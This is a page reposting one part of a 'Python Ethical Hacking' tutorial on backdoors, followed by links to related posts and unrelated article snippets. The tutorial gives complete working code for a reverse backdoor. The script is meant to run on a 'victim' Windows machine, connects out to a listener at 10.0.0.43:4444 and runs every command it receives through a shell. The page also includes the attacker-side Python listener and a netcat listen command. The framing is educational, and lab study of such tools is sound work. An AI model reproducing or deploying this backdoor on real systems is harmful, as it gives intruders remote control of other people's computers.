REVERSE_BACKDOOR

  • Access file system.
  • Execute system commands.
  • Download files.
  • Upload files.
  • Persistence.

BACKDOORS

An interactive program gives access to a system its executed on.

  • Command execution.
  • Access file system.
  • Upload/download files.
  • Run keylogger.
  • ...etc

Write the Reverse backdoor Python script and execute on Windows machine. (Victim machine)

#!/usr/bin/env python

import socket

import subprocess

def execute_system_command(command):

    return subprocess.check_output(command, shell=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection.connect(("10.0.0.43", 4444))

connection.send(b"\n[+] Connection established.\n")

while True:

    command = connection.recv(1024).decode()

    command_result = execute_system_command(command)

    connection.send(command_result)

connection.close()

Run the listening progress on the Kali Linux to establish the connection and execute the system commands.

nc -vv -l -p

Write and execute the Python Listener:

#!/usr/bin/env python

import socket

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

listener.bind(("10.0.0.43", 4444))

listener.listen(0)

print("[+] Waiting for incoming connections")

connection, address = listener.accept()

print("[+] Got a connection from " + str(address))

while True:

    command = input(">> ").encode()

    connection.send(command)

    result = connection.recv(1024).decode()

    print(result)

Python Ethical Hacking - BACKDOORS(1)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. Redis的常用配置

    1. 配置守护线程方式运行,修改damonize,使用yes启用守护线程,这样就可以后台运行了 damonize no 修改为 damonize yes 2. 手动指定redis的pid,可以通过pi ...

  2. 手把手教你利用Docker+jenkins部署你的网站

    更新服务器的安装源为阿里的源,参考链接:https://blog.csdn.net/js_xh/article/details/79166655 安装docker; 1 更新资源 sudo apt-g ...

  3. springboot自动装配原理

    最近开始学习spring源码,看各种文章的时候看到了springboot自动装配实现原理.用自己的话简单概括下. 首先打开一个基本的springboot项目,点进去@SpringBootApplica ...

  4. WebGPU+光线追踪Ray Tracing 开发三个月总结

    大家好~这三个月以来,我一直在学习和实现"基于WebGPU的混合光线追踪实时渲染"的技术,使用了Ray Tracing管线(如.rgen..rmiss等着色器). 现在与大家分享和 ...

  5. 入门大数据---HDFS,Zookeeper,ZookeeperFailOverController(简称:ZKFC),JournalNode是什么?

    HDFS介绍: 简述: Hadoop Distributed File System(HDFS)是一种分布式文件系统,设计用于在商用硬件上运行.它与现有的分布式文件系统有许多相似之处.但是,与其他分布 ...

  6. 最新的一波Vue实战技巧,不用则已,一用惊人

    在Vue中,不同的选项有不同的合并策略,比如 data,props,methods是同名属性覆盖合并,其他直接合并,而生命周期钩子函数则是将同名的函数放到一个数组中,在调用的时候依次调用 在Vue中, ...

  7. Java 反射简介

    本文部分内容参考博客.点击链接可以查看原文. 1. 反射的概念 反射是指在运行时将类的属性.构造函数和方法等元素动态地映射成一个个对象.通过这些对象我们可以动态地生成对象实例,调用类的方法和更改类的属 ...

  8. python文件处理-将图像根据坐标切割成若干小图

    代码涉及到:遍历目标路径,选取csv后缀的文件,遍历csv每一行,读取坐标,用cv操作图片 # !/usr/bin/python # -*- coding: UTF- -*- import panda ...

  9. vue基础入门(3)

    3.组件基础 3.1.什么是组件? 3.1.1.理解组件 前端组件化开发是目前非常流行的方式,什么是前端组件化开发呢?就是将页面的某一部分独立出来,将这一部分的数据.视图.以及一些控制逻辑封装到一个组 ...

  10. MFC 结束线程

    在wtl工程中定义一个现成,如下:DWORD WINAPI ThreadFunc( LPVOID pParam ){if( g_pMainlg )g_pMainlg->DoEnumNetwork ...